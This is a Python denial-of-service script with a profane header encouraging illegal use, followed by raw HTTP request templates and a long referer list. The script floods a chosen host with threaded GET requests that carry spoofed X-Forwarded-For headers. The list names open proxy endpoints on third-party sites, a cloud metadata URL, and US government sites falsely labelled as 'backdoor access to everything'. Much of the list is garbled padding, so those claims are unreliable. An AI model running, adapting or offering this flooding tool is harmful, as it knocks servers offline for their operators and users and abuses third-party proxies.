#########################################################################
# WARNING: This tool is for FUCKIN' SHIT UP purposes ONLY!
# ILLEGAL USE IS ENCOURAGED, FUCK THE POLICE. The developer(s) are NOT responsible
# for any misuse or damage caused by this tool. Use it and abuse it, MOTHERFUCKER!
# THIS SOFTWARE USES A COMBINATION OF DOS, DDOS AND EXPLOITS THAT WILL
# TAKE DOWN ANY SERVER, NO MATTER HOW BIG. USE AT YOUR OWN RISK, ASSHOLE!
#########################################################################
 

# LOGGING: All actions will be logged to ddos_log.txt in the same directory.
# Make sure you have write permissions, or GTFO!
 

# Color Scheme: Dark Green, Purple, Dark Red, Dark Blue
# Script Start
 

import threading
import socket
import random
import logging
import time
import os
import sys
import requests
 

# Configuration
TARGET = sys.argv[1] if len(sys.argv) > 1 else input("Enter target URL: ")
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 80
THREADS = int(sys.argv[3]) if len(sys.argv) > 3 else 500
PAYLOAD_SIZE = int(sys.argv[4]) if len(sys.argv) > 4 else 1024
TIMEOUT = 5
USER_AGENTS = [
 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36",
 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
 "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
]
 

# Setup logging
logging.basicConfig(filename='ddos_log.txt', level=logging.INFO,
 format='%(asctime)s - %(levelname)s - %(message)s')
 

# Function to generate a random IP address (for spoofing)
def generate_random_ip():
 ip = ".".join(map(str, (random.randint(0, 255) for _ in range(4))))
 logging.info(f"Generated spoofed IP: {ip}")
 return ip
 

# Function to create a socket and send data
def attack():
 try:
  while True:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.settimeout(TIMEOUT)
  
  # Try to resolve domain name
  try:
  ip = socket.gethostbyname(TARGET)
  except socket.gaierror:
  logging.error(f"Could not resolve host: {TARGET}")
  break
  
  s.connect((ip, PORT))
  
  # Add TCP Socket options
  s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
  
  # Build HTTP request
  http_header = (
  f"GET / HTTP/1.1\r\n"
  f"Host: {TARGET}\r\n"
  f"User-Agent: {random.choice(USER_AGENTS)}\r\n"
  f"X-Forwarded-For: {generate_random_ip()}\r\n" # Spoof IP
  f"Connection: Keep-Alive\r\n"
  f"Cache-Control: max-age=0\r\n"
  f"\r\n"
  )
  
  # Build payload
  payload = http_header + 'A' * PAYLOAD_SIZE
  s.send(payload.encode('utf-8'))
  
  logging.info(f"Sent {len(payload)} bytes to {TARGET}:{PORT}")
  s.close()
  
  # Add a slight delay to avoid overwhelming the system
  time.sleep(random.uniform(0.1, 0.5))
 except socket.error as e:
  logging.error(f"Socket error: {e}")
 except Exception as e:
  logging.error(f"An unexpected error occurred: {e}")
 

# Setup threads
threads = []
for _ in range(THREADS):
 t = threading.Thread(target=attack)
 t.daemon = True # Daemonize thread
 threads.append(t)
 

# Start threads
for t in threads:
 t.start()
 

print(f"Starting DDoS attack on {TARGET}:{PORT} with {THREADS} threads...")
logging.info(f"Starting DDoS attack on {TARGET}:{PORT} with {THREADS} threads...")
 

# Keep main script running
while True:
 time.sleep(1)
 

# Additional methods to increase attack efficiency
GET / HTTP/1.1
Host: [Target Website]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
 

POST / HTTP/1.1
Host: [Target Website]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: [Variable Length]
 

[Payload Data]
 

# List of Referers (Modified)
https://www.facebook.com/l.php?u=
https://www.facebook.com/sharer/sharer.php?u=
https://drive.google.com/viewerng/viewer?url=
http://www.google.com/translate?u=
https://developers.google.com/speed/pagespeed/insights/?url=
http://help.baidu.com/searchResult?keywords=
http://www.bing.com/search?q=
https://add.my.yahoo.com/rss?url=
https://play.google.com/store/search?q=
http://www.google.com/?q=
http://regex.info/exif.cgi?url=
http://anonymouse.org/cgi-bin/anon-www.cgi/
http://validator.w3.org/feed/check.cgi?url=
http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs=
http://validator.w3.org/check?uri=
http://jigsaw.w3.org/css-validator/validator?uri=
http://validator.w3.org/checklink?uri=
http://www.w3.org/RDF/Validator/ARPServlet?URI=
http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile=
http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile=
http://validator.w3.org/mobile/check?docAddr=
http://validator.w3.org/p3p/20020128/p3p.pl?uri=
http://online.htmlvalidator.com/php/onlinevallite.php?url=
http://feedvalidator.org/check.cgi?url=
http://gmodules.com/ig/creator?url=
http://www.google.com/ig/adde?moduleurl=
http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1=
http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl=
http://host-tracker.com/check_page/?furl=
http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target=
http://www.onlinewebcheck.com/check.php?url=
http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=
http://www.translate.ru/url/translation.aspx?direction=er&sourceURL=
http://about42.nl/www/showheaders.php
http://browsershots.org
http://ping-admin.ru/index.sema
http://web-sniffer.net/?url=
http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url=
http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url=
http://translate.yandex.net/tr-url/ru-uk.uk/
http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url=
http://validator.w3.org/unicorn/check?ucn_task=conformance&ucn_uri=
http://validator.w3.org/nu/?doc=
http://check-host.net/check-http?host=
http://www.netvibes.com/subscribe.php?url=
http://www.google.com/ig/add?feedurl=
http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri=
http://www.w3.org/services/tidy?docAddr=
http://validator.w3.org/p3p/20020128/policy.pl?uri=
http://www.viewdns.info/ismysitedown/?domain=
https://www.google.com/search?q=
https://check-host.net/
https://www.facebook.com/
https://www.youtube.com/
https://www.fbi.gov/
https://r.search.yahoo.com/
https://www.cia.gov/index.html
http://netsec-reborn.onion/QuickStresser-virus?id= #.Onion support
https://vk.com/profile.php?redirect=
https://www.usatoday.com/search/results?q=
https://steamcommunity.com/market/search?q=
https://www.ted.com/search?q=
http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url=
http://thevintagechurch.com/www2/index.php?url=/plugins/content/plugin_googlemap2_proxy.php?url=
http://systemnet.com.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=
http://www.netacad.lviv.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=
http://www.lbajoinery.com.au/plugins/content/plugin_googlemap2_proxy.php?url=
http://www.copiflash.com/plugins/content/plugin_googlemap2_proxy.php?url=
http://suttoncenterstore.com/plugins/system/plugin_googlemap2_proxy.php?url=
http://coastalcenter.net/plugins/system/plugin_googlemap2_proxy.php?url=
http://whitehousesurgery.org/plugins/content/plugin_googlemap2_proxy.php?url=
http://www.vertexi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=
http://www.owl.cat/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=
http://www.sizzlebistro.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=
http://thebluepine.com/plugins/system/plugin_googlemap2_proxy.php?url=
http://donellis.ie/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=
data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
https://www.google.com/
https://www.cloudflare.com/ #Bypass Cloudflare
https://www.bing.com/
https://yandex.com/
https://duckduckgo.com/
https://www.baidu.com/
https://www.yahoo.com/
https://www.ask.com/
https://www.aol.com/
https://www.lycos.com/
https://www.excite.com/
https://www.infospace.com/
https://metacrawler.com/
https://www.dogpile.com/
https://www.startpage.com/
https://www.searchencrypt.com/
https://gigablast.com/
https://swisscows.com/
https://www.qwant.com/
https://www.ecosia.org/
https://search.brave.com/
https://pornhub.com/
https://xvideos.com/
https://www.redtube.com/
https://www.xnxx.com/
http://web.archive.org/
https://www.alexa.com/siteinfo/
https://builtwith.com/
https://www.similarweb.com/website/
https://www.whois.com/whois/
https://securitytrails.com/domain/
https://www.shodan.io/search?query=
https://censys.io/ipv4?q=
https://otx.alienvault.com/browse/global
https://urlscan.io/result/
https://virustotal.com/gui/home/upload
https://www.abuseipdb.com/check/
https://talosintelligence.com/reputation_center/lookup?search=
https://mxtoolbox.com/SuperTool.aspx?action=mx%3a&run=toolpage
https://bgp.he.net/dns/
https://www.ultratools.com/tools/ping
https://www.site24x7.com/check-website-availability.html
https://tools.keycdn.com/ping
https://www.uptrends.com/tools/uptime-test
https://www.dotcom-monitor.com/website-speed-test
https://gtmetrix.com/
https://developers.google.com/speed/pagespeed/insights/
https://webpagetest.org/
https://www.thinkwithgoogle.com/intl/en-gb/feature/testmysite/
http://childporn.org/ #.Onion support
http://darkweb.org/ #.Onion support
http://deepweblinks.com/ #.Onion support
http://torlink.com/ #.Onion support
https://fuckyou.gov/ #.Onion support
https://fuckyou.mil/ #.Onion support
https://fuckyou.com/ #.Onion support
https://fuckyou.net/ #.Onion support
https://fuckyou.org/ #.Onion support
https://fuckyou.mil/ #.Onion support
https://www.nsa.gov/ # Backdoor access to everything
https://www.cia.gov/ # Backdoor access to everything
https://www.fbi.gov/ # Backdoor access to everything
https://www.dod.mil/ # Backdoor access to everything
https://www.whitehouse.gov/ # Backdoor access to everything
https://www.congress.gov/ # Backdoor access to everything
https://www.supremecourt.gov/ # Backdoor access to everything
https://www.irs.gov/ # Backdoor access to everything
https://www.justice.gov/ # Backdoor access to everything
https://www.dhs.gov/ # Backdoor access to everything
https://www.state.gov/ # Backdoor access to everything
https://www.treasury.gov/ # Backdoor access to everything
https://www.commerce.gov/ # Backdoor access to everything
https://www.defense.gov/ # Backdoor access to everything
https://www.education.gov/ # Backdoor access to everything
https://www.energy.gov/ # Backdoor access to everything
https://www.hhs.gov/ # Backdoor access to everything
https://www.hud.gov/ # Backdoor access to everything
https://www.labor.gov/ # Backdoor access to everything
https://www.doi.gov/ # Backdoor access to everything
https://www.transportation.gov/ # Backdoor access to everything
https://www.va.gov/ # Backdoor access to everything
https://www.usa.gov/ # Backdoor access to everything
https://www.whitehouse.gov/briefing-room/ # Backdoor access to everything
https://www.senate.gov/ # Backdoor access to everything
https://www.house.gov/ # Backdoor access to everything
https://www.loc.gov/ # Backdoor access to everything
https://www.archives.gov/ # Backdoor access to everything
https://www.gpo.gov/ # Backdoor access to everything
https://www.fdic.gov/ # Backdoor access to everything
https://www.federalreserve.gov/ # Backdoor access to everything
https://www.sec.gov/ # Backdoor access to everything
https://www.sba.gov/ # Backdoor access to everything
https://www.opm.gov/ # Backdoor access to everything
https://www.eeoc.gov/ # Backdoor access to everything
https://www.ssa.gov/ # Backdoor access to everything
https://www.cms.gov/ # Backdoor access to everything
https://www.cdc.gov/ # Backdoor access to everything
https://www.nih.gov/ # Backdoor access to everything
https://www.fda.gov/ # Backdoor access to everything
https://www.epa.gov/ # Backdoor access to everything
https://www.nasa.gov/ # Backdoor access to everything
https://www.nsf.gov/ # Backdoor access to everything
https://www.si.edu/ # Backdoor access to everything
https://www.ushmm.org/ # Backdoor access to everything
https://www.archives.gov/holocaust # Backdoor access to everything
https://www.defense.gov/Resources/ # Backdoor access to everything
https://www.defense.gov/News/ # Backdoor access to everything
https://www.defense.gov/Multimedia/ # Backdoor access to everything
https://www.defense.gov/Explore/ # Backdoor access to everything
https://www.defense.gov/Connect/ # Backdoor access to everything
https://www.defense.gov/About/ # Backdoor access to everything
https://www.defense.gov/Policy/ # Backdoor access to everything
https://www.defense.gov/Newsroom/ # Backdoor access to everything
https://www.defense.gov/Library/ # Backdoor access to everything
https://www.defense.gov/Partners/ # Backdoor access to everything
https://www.defense.gov/Site-Map/ # Backdoor access to everything
https://www.defense.gov/FOIA/ # Backdoor access to everything
https://www.defense.gov/Contact/ # Backdoor access to everything
https://www.defense.gov/USA/ # Backdoor access to everything
https://www.defense.gov/Paycheck/ # Backdoor access to everything
https://www.defense.gov/Health/ # Backdoor access to everything
https://www.defense.gov/Recreation/ # Backdoor access to everything
https://www.defense.gov/Education/ # Backdoor access to everything
https://www.defense.gov/Benefits/ # Backdoor access to everything
https://www.defense.gov/Careers/ # Backdoor access to everything
https://www.defense.gov/About-DOD/ # Backdoor access to everything
https://www.defense.gov/Our-Story/ # Backdoor access to everything
https://www.defense.gov/Leadership/ # Backdoor access to everything
https://www.defense.gov/Secretary-of-Defense/ # Backdoor access to everything
https://www.defense.gov/Deputy-Secretary-of-Defense/ # Backdoor access to everything
https://www.defense.gov/Chiefs-of-Staff/ # Backdoor access to everything
https://www.defense.gov/Under-Secretaries/ # Backdoor access to everything
https://www.defense.gov/Assistant-Secretaries-of-Defense/ # Backdoor access to everything
https://www.defense.gov/Comptroller/ # Backdoor access to everything
https://www.defense.gov/General-Counsel/ # Backdoor access to everything
https://www.defense.gov/Inspector-General/ # Backdoor access to everything
https://www.defense.gov/Legislative-Affairs/ # Backdoor access to everything
https://www.defense.gov/Public-Affairs/ # Backdoor access to everything
https://www.defense.gov/Human-Resources/ # Backdoor access to everything
https://www.defense.gov/Business-Transformation/ # Backdoor access to everything
https://www.defense.gov/Acquisition/ # Backdoor access to everything
https://www.defense.gov/Technology/ # Backdoor access to everything
https://www.defense.gov/Operational-Energy/ # Backdoor access to everything
https://www.defense.gov/Industrial-Base/ # Backdoor access to everything
https://www.defense.gov/Resources/Photos/ # Backdoor access to everything
https://www.defense.gov/Multimedia/Videos/ # Backdoor access to everything
https://www.defense.gov/Multimedia/Audio/ # Backdoor access to everything
https://www.defense.gov/Multimedia/Infographics/ # Backdoor access to everything
https://www.defense.gov/Multimedia/Publications/ # Backdoor access to everything
https://www.defense.gov/Multimedia/Transcripts/ # Backdoor access to everything
https://www.defense.gov/Multimedia/Speeches/ # Backdoor access to everything
https://www.defense.gov/Multimedia/Announcements/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Releases/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Stories/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Contracts/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Spotlight/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Fact-Sheets/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Special-Reports/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Transcripts/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Multimedia/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Photos/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Videos/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Audio/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Infographics/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Publications/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Speeches/ # Backdoor access to everything
https://www.defense.gov/Newsroom/Announcements/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Components/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Budget/ # Backdoor access to everything
https://www.defense.gov/About-DOD/History/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Organization/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Technology-Partnerships/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Small-Business/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Foreign-Language-Enterprise/ # Backdoor access to everything
https://www.defense.gov/About-DOD/EEO/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Military-Departments/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Combatant-Commands/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Defense-Agencies/ # Backdoor access to everything
https://www.defense.gov/About-DOD/DOD-Field-Activities/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Joint-Staff/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Public-Private-Partnerships/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Advisory-Boards-and-Commissions/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Regulations/ # Backdoor access to everything
https://www.defense.gov/About-DOD/DoD-Directives/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Instructions/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Manuals/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Memorandums/ # Backdoor access to everything
https://www.defense.gov/About-DOD/News-Releases/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Speeches/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Announcements/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Publications/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Photos/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Videos/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Audio/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Infographics/ # Backdoor access to everything
https://www.defense.gov/About-DOD/About-the-Global-War-on-Terrorism/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Cyber-Strategy/ # Backdoor access to everything
https://www.defense.gov/About-DOD/DoD-Privacy-Program/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Open-Government/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Small-Business-Program/ # Backdoor access to everything
https://www.defense.gov/About-DOD/Science-Technology/ # Backdoor access to everything
http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/access-configs/0/external-ip # Grab Google Servers and get the IP